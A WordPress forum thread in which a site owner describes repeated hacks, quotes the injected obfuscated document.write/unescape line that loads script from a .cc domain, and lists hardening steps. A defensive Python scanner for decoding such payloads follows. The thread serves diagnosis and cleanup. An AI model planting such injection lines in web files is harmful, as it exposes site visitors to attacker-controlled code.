• For a while now, a WordPress site I host has been continually hacked. All the other blogs I host are untouched, it’s just the one in top level. I keep fixing it and doing more to harden my installation, but it doesn’t seem to stop them – every couple days it’s hacked again. The hack is simple and consistent; they add a line like this to my wp-blog-header.php:

    document.write(unescape(‘%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6A%73%2D%6F%2D%61%68%63%77%2E%63%7A%2E%63%63%2F%31%31%22%3E%3C%2F%73%63%72%69%70%74%3E’));

    Sometimes it ends up elsewhere, most recently jquery.js. It’s always taking visitors to some .cc domain.

    I’ve done everything I can to keep the site secure:

    – Ultimate Security Checker and Bulletproof Security (hardened .htaccess files) plugins installed and configured
    – WP and plugins kept up to date
    – unused plugins and themes deleted
    – FTP password secured with KeePass and stored nowhere else (no program (FileZilla, etc) is allowed to “remember” it).
    – WP admin account has no privileges, real admin account under a different user
    – file permissions as recommended

    Yet every couple days the site is hacked in the same way. What else can I do to stop this? My hunch is that it’s a rogue PHP file. I’ve downloaded my install and done diffs, but I’m wondering if it’s hiding in wp-content since it’s publicly accessible and is never deleted. Maybe hiding in cache? How can I check for that?

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter liquidcool

    (@liquidcool)

    Thanks. After reading that, I downloaded a copy of my files and used diff to compare them with the latest WP. Found a few extra files, but nothing looked too suspicious. Still, they’re gone now. Of course, that doesn’t include wp-content.

    I think the biggest potential danger there is the cache directory, which I note is not in the current WP. I thought it was active, but I just noticed its modification time was 6/09, so I’ve deleted it. Hopefully the culprit was hiding somewhere in there. If not, I guess I’ll delete and re-add all my plugins. Hope this helps someone.
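
One way to do the check asked about in this thread, as an added example that is not part of the original posts: walk a downloaded copy of the site, wp-content and its cache directory included, and decode every percent-encoded `unescape()` argument so the injected script source is visible. The function names, the sample payload and the `example.invalid` host are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# unescape('...') whose argument is a run of 8+ %XX escapes (obfuscated markup).
ENCODED = re.compile(r"unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}){8,})")
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
SCAN_EXT = (".php", ".js", ".html", ".htm")

# Constructed sample payload; example.invalid is a placeholder host.
_TAG = b'<script src="http://example.invalid/x"></script>'
SAMPLE = "document.write(unescape('" + "".join(f"%{b:02X}" for b in _TAG) + "'));"

def scan_text(text):
    """Decode every percent-encoded unescape() argument found in text."""
    findings = []
    for match in ENCODED.finditer(text):
        decoded = unquote(match.group(1))
        src = SCRIPT_SRC.search(decoded)
        findings.append({"decoded": decoded,
                         "script_src": src.group(1) if src else None})
    return findings

def scan_tree(root):
    """Return {relative path: findings} for files under root with hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:  # stand-in for a downloaded copy
        os.makedirs(os.path.join(site, "wp-content", "cache"))
        with open(os.path.join(site, "wp-content", "cache", "x.php"), "w") as fh:
            fh.write("<?php // cached page ?>\n<script>" + SAMPLE + "</script>\n")
        for rel, found in scan_tree(site).items():
            print(rel, "->", [f["script_src"] for f in found])
```

A hit shows where the injected line was written; it does not identify the file that wrote it, so the extra-file diff against a clean WordPress copy is still needed.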

  • The topic ‘Site constantly hacked’ is closed to new replies.